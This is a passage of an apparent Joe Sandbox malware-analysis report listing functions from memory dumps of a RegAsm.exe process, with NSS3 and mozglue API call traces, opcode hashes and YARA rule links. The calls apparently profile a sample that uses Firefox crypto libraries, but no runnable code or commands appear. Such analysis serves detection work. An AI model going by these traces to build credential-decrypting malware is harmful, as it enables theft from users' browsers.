                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                • String ID: security
                                                                                • API String ID: 3379159031-3315324353
                                                                                • Opcode ID: 72dda1182fe72708bb29d1612b3433adaa1520b5dd516b0440ca00033bc6e6e6
                                                                                • Instruction ID: c53161ba68fa027d12d4ee4e7fc1ae9a5f5a10e8adb8d984c6e1574ba2373f3d
                                                                                • Opcode Fuzzy Hash: 72dda1182fe72708bb29d1612b3433adaa1520b5dd516b0440ca00033bc6e6e6
                                                                                • Instruction Fuzzy Hash: 14014870740270DBE7202F3C9C056563668BF13788F055626E80CD6A61EB78C155DBD2
                                                                                Function 6C95AFB0 Relevance: 9.4, APIs: 6, Instructions: 355memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.VCRUNTIME140(?,00000000,00000140), ref: 6C95AFF4
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C95B02F
                                                                                  • Part of subcall function 6C95EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C95EE85
                                                                                  • Part of subcall function 6C95EE50: realloc.MOZGLUE(DA5D7AA7,?), ref: 6C95EEAE
                                                                                  • Part of subcall function 6C95EE50: PORT_Alloc_Util.NSS3(?), ref: 6C95EEC5
                                                                                  • Part of subcall function 6C95EE50: htonl.WSOCK32(?), ref: 6C95EEE3
                                                                                  • Part of subcall function 6C95EE50: htonl.WSOCK32(00000000,?), ref: 6C95EEED
                                                                                  • Part of subcall function 6C95EE50: memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C95EF01
                                                                                  • Part of subcall function 6C95EF30: PR_SetError.NSS3(FFFFE013,00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95EF6D
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C95B2F7
                                                                                  • Part of subcall function 6C95EF30: htonl.WSOCK32(00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95EFE4
                                                                                  • Part of subcall function 6C95EF30: htonl.WSOCK32(?,00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95EFF1
                                                                                  • Part of subcall function 6C95EF30: memcpy.VCRUNTIME140(?,?,6C97A4A1,?,00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95F00B
                                                                                  • Part of subcall function 6C95EF30: memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95F027
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,?,000003E8,00000000), ref: 6C95B339
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,000003E8,00000000), ref: 6C95B357
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C95B3A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: htonlmemcpy$ErrorUtil$Item_$AllocAlloc_Unothrow_t@std@@@ValueZfree__ehfuncinfo$??2@memsetrealloc
                                                                                • String ID:
                                                                                • API String ID: 1535029029-0
                                                                                • Opcode ID: 8e267412c95dc824bffafc9bcfbb939a103535881f0978dee04f0d1b8bea3af6
                                                                                • Instruction ID: 40b7b90d75d1ebe2bf13e769f6a1352dd182e380492d4942a82943e2da7d246c
                                                                                • Opcode Fuzzy Hash: 8e267412c95dc824bffafc9bcfbb939a103535881f0978dee04f0d1b8bea3af6
                                                                                • Instruction Fuzzy Hash: D0B1C7B1A053006BF711DB358C81FAB72BDAF2470CF840929FE5596A82F775D5288692
                                                                                Function 6C972E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C973046
                                                                                  • Part of subcall function 6C95EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C95EE85
                                                                                • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C947FFB), ref: 6C97312A
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C973154
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C972E8B
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                  • Part of subcall function 6C95F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C949BFF,?,00000000,00000000), ref: 6C95F134
                                                                                • memcpy.VCRUNTIME140(8B3C75C0,?,6C947FFA), ref: 6C972EA4
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C97317B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Error$memcpy$K11_Value
                                                                                • String ID:
                                                                                • API String ID: 2334702667-0
                                                                                • Opcode ID: 31da218d2e51ed971091d82426eaa75b2fab0c4ce734c2c9834881566a16d312
                                                                                • Instruction ID: deda1f4b36e3f8cd1a306bd5dc912c06bdcf49d0edb8247335dcf189909f5207
                                                                                • Opcode Fuzzy Hash: 31da218d2e51ed971091d82426eaa75b2fab0c4ce734c2c9834881566a16d312
                                                                                • Instruction Fuzzy Hash: B7A1AC71A002189FDB24CF54CC84BEAB7B5EF59308F048199E94967741E731EE95CFA1
                                                                                Function 6C93ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C93ED6B
                                                                                • PORT_Alloc_Util.NSS3(00000000), ref: 6C93EDCE
                                                                                  • Part of subcall function 6C930BE0: malloc.MOZGLUE(6C928D2D,?,00000000,?), ref: 6C930BF8
                                                                                  • Part of subcall function 6C930BE0: TlsGetValue.KERNEL32(6C928D2D,?,00000000,?), ref: 6C930C15
                                                                                • free.MOZGLUE(00000000,?,?,?,?,6C93B04F), ref: 6C93EE46
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C93EECA
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C93EEEA
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C93EEFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                • String ID:
                                                                                • API String ID: 3768380896-0
                                                                                • Opcode ID: d193e7c15e59e1551d657ef5d10254cb2b0396754e297d761518b7c8a69e8ab9
                                                                                • Instruction ID: 147a0832559e66e1dfb8ffde1d689ec056f1e25d157225468b9ea3da407064fa
                                                                                • Opcode Fuzzy Hash: d193e7c15e59e1551d657ef5d10254cb2b0396754e297d761518b7c8a69e8ab9
                                                                                • Instruction Fuzzy Hash: E0816EB5A002159FEB24CF55DD80BAB7BF9BF49308F144428E8299B791D735EC14CBA1
                                                                                Function 6C8114A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C8114C5
                                                                                • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8114E2
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C811546
                                                                                • InitializeConditionVariable.KERNEL32(?), ref: 6C8115BA
                                                                                • free.MOZGLUE(?), ref: 6C8116B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                • String ID:
                                                                                • API String ID: 1909280232-0
                                                                                • Opcode ID: cf3e1488ff1228741c4a523ce57def95565b7feacef671cb495adeb977c7ce01
                                                                                • Instruction ID: 11e624ef38ec0d2cdc96f9839556013429ff258492db87d1670b5360b1e2e35a
                                                                                • Opcode Fuzzy Hash: cf3e1488ff1228741c4a523ce57def95565b7feacef671cb495adeb977c7ce01
                                                                                • Instruction Fuzzy Hash: 4661E072A047159BDB318F24C984BDAB7B4BF99308F44892CED8A57B01DB35E948CBD1
                                                                                Function 6C93CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C93C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C93DAE2,?), ref: 6C93C6C2
                                                                                • PR_Now.NSS3 ref: 6C93CD35
                                                                                  • Part of subcall function 6C999DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DC6
                                                                                  • Part of subcall function 6C999DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DD1
                                                                                  • Part of subcall function 6C999DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C999DED
                                                                                  • Part of subcall function 6C926C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C8D1C6F,00000000,00000004,?,?), ref: 6C926C3F
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C93CD54
                                                                                  • Part of subcall function 6C999BF0: TlsGetValue.KERNEL32(?,?,?,6C9E0A75), ref: 6C999C07
                                                                                  • Part of subcall function 6C927260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C8D1CCC,00000000,00000000,?,?), ref: 6C92729F
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C93CD9B
                                                                                • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C93CE0B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C93CE2C
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C93CE40
                                                                                  • Part of subcall function 6C9314C0: TlsGetValue.KERNEL32 ref: 6C9314E0
                                                                                  • Part of subcall function 6C9314C0: EnterCriticalSection.KERNEL32 ref: 6C9314F5
                                                                                  • Part of subcall function 6C9314C0: PR_Unlock.NSS3 ref: 6C93150D
                                                                                  • Part of subcall function 6C93CEE0: PORT_ArenaMark_Util.NSS3(?,6C93CD93,?), ref: 6C93CEEE
                                                                                  • Part of subcall function 6C93CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C93CD93,?), ref: 6C93CEFC
                                                                                  • Part of subcall function 6C93CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C93CD93,?), ref: 6C93CF0B
                                                                                  • Part of subcall function 6C93CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C93CD93,?), ref: 6C93CF1D
                                                                                  • Part of subcall function 6C93CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF47
                                                                                  • Part of subcall function 6C93CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF67
                                                                                  • Part of subcall function 6C93CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C93CD93,?,?,?,?,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF78
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 3748922049-0
                                                                                • Opcode ID: d569066e4c1d0b7386ae602ae2a737f8323b344762bfa18383243802d0fc6b51
                                                                                • Instruction ID: fe0bfef95d9e800688d78388269d90fa5d1876dd8b1d569495e402ad20eca260
                                                                                • Opcode Fuzzy Hash: d569066e4c1d0b7386ae602ae2a737f8323b344762bfa18383243802d0fc6b51
                                                                                • Instruction Fuzzy Hash: EB51D576A006309FE720EF69DC40B9A73E8AF68348F255624D85D9B790EB31ED05CB91
                                                                                Function 6C90EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C90EF38
                                                                                  • Part of subcall function 6C8F9520: PK11_IsLoggedIn.NSS3(00000000,?,6C92379E,?,00000001,?), ref: 6C8F9542
                                                                                • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C90EF53
                                                                                  • Part of subcall function 6C914C20: TlsGetValue.KERNEL32 ref: 6C914C4C
                                                                                  • Part of subcall function 6C914C20: EnterCriticalSection.KERNEL32(?), ref: 6C914C60
                                                                                  • Part of subcall function 6C914C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914CA1
                                                                                  • Part of subcall function 6C914C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C914CBE
                                                                                  • Part of subcall function 6C914C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914CD2
                                                                                  • Part of subcall function 6C914C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C914D3A
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C90EF9E
                                                                                  • Part of subcall function 6C999BF0: TlsGetValue.KERNEL32(?,?,?,6C9E0A75), ref: 6C999C07
                                                                                • free.MOZGLUE(00000000), ref: 6C90EFC3
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C90F016
                                                                                • free.MOZGLUE(00000000), ref: 6C90F022
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                • String ID:
                                                                                • API String ID: 2459274275-0
                                                                                • Opcode ID: d6b85ab24d84076fcdc5e96c36b14bb76f317112268e196e8e2628a1a274fb16
                                                                                • Instruction ID: 0a190ff7bbc3cf8f9edd046901805bd49e384f4dae789159535a62c07afa6461
                                                                                • Opcode Fuzzy Hash: d6b85ab24d84076fcdc5e96c36b14bb76f317112268e196e8e2628a1a274fb16
                                                                                • Instruction Fuzzy Hash: FB4183B1E0020AAFDF018FA9DC45BEF7BB9AF58358F044029F914A7350E775C9158BA5
                                                                                Function 6C8E2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C8D2D1A), ref: 6C8E2E7E
                                                                                  • Part of subcall function 6C9307B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C8D8298,?,?,?,6C8CFCE5,?), ref: 6C9307BF
                                                                                  • Part of subcall function 6C9307B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9307E6
                                                                                  • Part of subcall function 6C9307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C93081B
                                                                                  • Part of subcall function 6C9307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C930825
                                                                                • PR_Now.NSS3 ref: 6C8E2EDF
                                                                                • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C8E2EE9
                                                                                • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C8D2D1A), ref: 6C8E2F01
                                                                                • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C8D2D1A), ref: 6C8E2F50
                                                                                • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C8E2F81
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                • String ID:
                                                                                • API String ID: 287051776-0
                                                                                • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                • Instruction ID: 3e410ebe6c296ce1330a70e4e40433a376a1a66f5719d68df76008bab46c8b0f
                                                                                • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                • Instruction Fuzzy Hash: 2A3157715011478BF730C619DD8CBAF7265EF8A318F240E79D02E97AD0EB38D886C611
                                                                                Function 6C8D0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CERT_DecodeAVAValue.NSS3(?,?,6C8D0A2C), ref: 6C8D0E0F
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C8D0A2C), ref: 6C8D0E73
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C8D0A2C), ref: 6C8D0E85
                                                                                • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C8D0A2C), ref: 6C8D0E90
                                                                                • free.MOZGLUE(00000000), ref: 6C8D0EC4
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C8D0A2C), ref: 6C8D0ED9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                • String ID:
                                                                                • API String ID: 3618544408-0
                                                                                • Opcode ID: 5438f45bc5ad69211d500c268489c0430dd5664b2c81e76cc18cda6643d03b4e
                                                                                • Instruction ID: 6e04f28ead4048810c56728b934f97b1fe699848b8c733c8e357aef7b3968e1b
                                                                                • Opcode Fuzzy Hash: 5438f45bc5ad69211d500c268489c0430dd5664b2c81e76cc18cda6643d03b4e
                                                                                • Instruction Fuzzy Hash: 29213EB2E0029B57EB3045669E85B6B72AEDFD1748F1B4C35D81C97A02EB60F81483A1
                                                                                Function 0041ABF7 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 0041AC05
                                                                                  • Part of subcall function 004195E3: __mtinitlocknum.LIBCMT ref: 004195F9
                                                                                  • Part of subcall function 004195E3: __amsg_exit.LIBCMT ref: 00419605
                                                                                  • Part of subcall function 004195E3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142,?,?,0041824B,00000000,0042C9F8,00418292,?), ref: 0041960D
                                                                                • DecodePointer.KERNEL32(0042C980,00000020,0041AD48,00000000,00000001,00000000,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D), ref: 0041AC41
                                                                                • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC52
                                                                                  • Part of subcall function 0041A1CA: EncodePointer.KERNEL32(00000000,0041DD9C,00640400,00000314,00000000,?,?,?,?,?,0041AF5F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A1CC
                                                                                • DecodePointer.KERNEL32(-00000004,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC78
                                                                                • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC8B
                                                                                • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC95
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
